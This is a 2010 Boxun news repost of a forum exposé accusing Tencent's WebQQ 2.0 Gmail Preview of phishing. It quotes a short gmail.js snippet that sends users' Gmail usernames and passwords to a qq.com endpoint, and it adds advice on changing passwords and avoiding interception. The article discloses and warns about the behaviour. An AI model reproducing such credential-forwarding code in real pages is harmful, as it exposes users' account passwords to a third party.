[加评论] 页面有问题?请点击打印板-》打印版                  [推荐此文给朋友]
[博讯主页]->[大陆新闻]
   

腾讯QQ网页钓鱼攻击Gmail盗取用户密码(图)
(博讯北京时间2010年9月14日 转载)
    
    论坛转载
    
    腾讯昨日推出WebQQ2.0,但是用过程中发现其 Gmail Preview 模块存在钓鱼的行为。当使用 Chrome 访问其 Gmail Preview 页面时提示为诱骗网站。
    腾讯QQ网页钓鱼攻击Gmail盗取用户密码
    
    展开这个页面的 iframe 地址,发现是在 qq.com 域下
    
    HTTPS://web2.qq.com/cgi/gmail/gmail.html
    
    腾讯QQ网页钓鱼攻击Gmail盗取用户密码


    但页面的形式与 Google 的风格一致,非常能让用户混淆这就是 Google 自家的页面。
    该页面内含一个登陆框,但在此框登录时,并未回到Gmail官方网站进行OAuth验证,就直接显示了未读邮件.
    
    查看其源代码,发现并没有提交到 Google 的痕迹。
    
    然后我们查看其相关的 gmail.js(HTTPS://web2.qq.com/cgi/gmail/gmail.js),发现其中有段代码为
    var option = {retype:3,callback:"parent.qqweb.app.gmail.getListMail"};
    if (u != null && p != null) {
     option.u = u; // Google 帐户用户名
     option.p = p; // Google 帐户密码
    }
    formSend( GMAIL_SERVER_DOMAIN + "cgi/qqweb/gmail.do",{method : "POST", data : option} );
    
    这段应该就是往 GMAIL_SERVER_DOMAIN POST 用户名和密码登录了,那么 GMAIL_SERVER_DOMAIN 的值是什么
    
    呢?就在本文件的第 14 行
    var GMAIL_SERVER_DOMAIN = 'HTTPS://web2.qq.com/';
    
    也就是说,你的 Gmail 用户名和密码实际上是提交到了
    HTTPS://web2.qq.com/cgi/qqweb/gmail.do
    
    这个地址。
    
    建议已经使用过该模块的用户尽快更改您的 Google 密码,并检查 Gmail 过滤器中有无可疑的项目。
    
    更新:
    1.今天该页面已经被举报为攻击页面,受到包括Firefox、Chrome等主流浏览器和Twitter等网站的拦截。
    2.腾讯紧急撤下了WebQQ2.0中的Gmail应用,将“QQ邮箱”替换到相应位置,对应的 JS 文件也已被删除.
    
    
    防止钓鱼攻击的应对方法:
    浏览器通过安全(可信任)的加密代理服务器或VPN上网,并以https方式登录google官方gmail网站即可.也特别要记得删除CNNIC证书.
    
    另外,有部分人认为通过https方式登录gmail就足够安全,这是错的.因为有https的加密有可能被"中间人攻击"攻破.
    
    通过安全(可信任)加密代理服务器或VPN上网可以防止"中间人攻击",保证https加密的安全.
    
    另外,浏览器的DNS解析方法要设定为通过远程解析,以防止DNS劫持攻击.如果你是使用firefox,把选项:network.proxy.socks_remote_dns设定为true即可. _(博讯自由发稿区发稿) (博讯 boxun.com)


博讯相关报道(最近20条,更多请利用搜索功能):
  • 胡锦涛的QQ号是多少?腾讯:暂不能透露
  • 《计算机世界》社长总编调岗 疑与“狗日的”腾讯有关(图)
  • 户网站腾讯出现“推翻中国共产党”的帖子(图)
  • 腾讯网提前报道尚健在的宋平“逝世”,网友悼念(图)
  • 网游竞争白热化:金山遭遇腾讯地毯式挖角
  • 揭露腾讯服务器记录QQ使用人ip地址的方法(图)
  • 湖南电视台台长下课 腾讯新闻“功不可没”
  • 腾讯公司疑推出QQ特别版本针对异议人士实施监控(图)
  • QQ群主致腾讯并马化腾的公开信
  • 搜狗开始报复:腾讯QQ大规模掉线震惊全国(图)
  • 两万六千个QQ群被封,部分群主对腾讯公司提出抗议
  • 腾讯公司证实中共指令封锁有关《零八宪章》消息(图)
  • “吴敬琏现身北京寓所击碎卷入美间谍案谣言”的腾讯报道,遭删除!
  • 《维权中国》网:腾讯公司已主动取消QQ禁止“民主”(图)
  • 腾讯声明谴责媒体封面标题《"狗日的"腾讯》(图)
  • 腾讯QQ的间谍后门会使Windows 7死机,资源管理器崩溃重启
  • 举报腾讯涉嫌煽动颠覆国家政权罪的公开报信/ 中华民国北京教师陈寿福
  • 腾讯博客:给思想插上翅膀/杨恒均
  • 希望贵网站揭露腾讯的无耻行径
  • 我被腾讯网判处“无期徒刑”
  • 强烈要求腾讯公司将“斗地主”游戏异名/龙兴围
  • 全民联合起诉腾讯QQ禁止“民主”2字 (图)


    点击这里对此新闻发表看法
  •    
    联系我们


    All rights reserved
    博讯是畅所欲言的场所、所有文章均不一定代表博讯立场
    声明:博讯由编辑、义务留学生、学者维护,如有版权问题,请联系我们。另外,欢迎其他媒体 转载博讯文章,为尊重作者的辛勤劳动以及所承担风险,尊重博讯广大义务人士的奉献,请转载时注明来源和作者。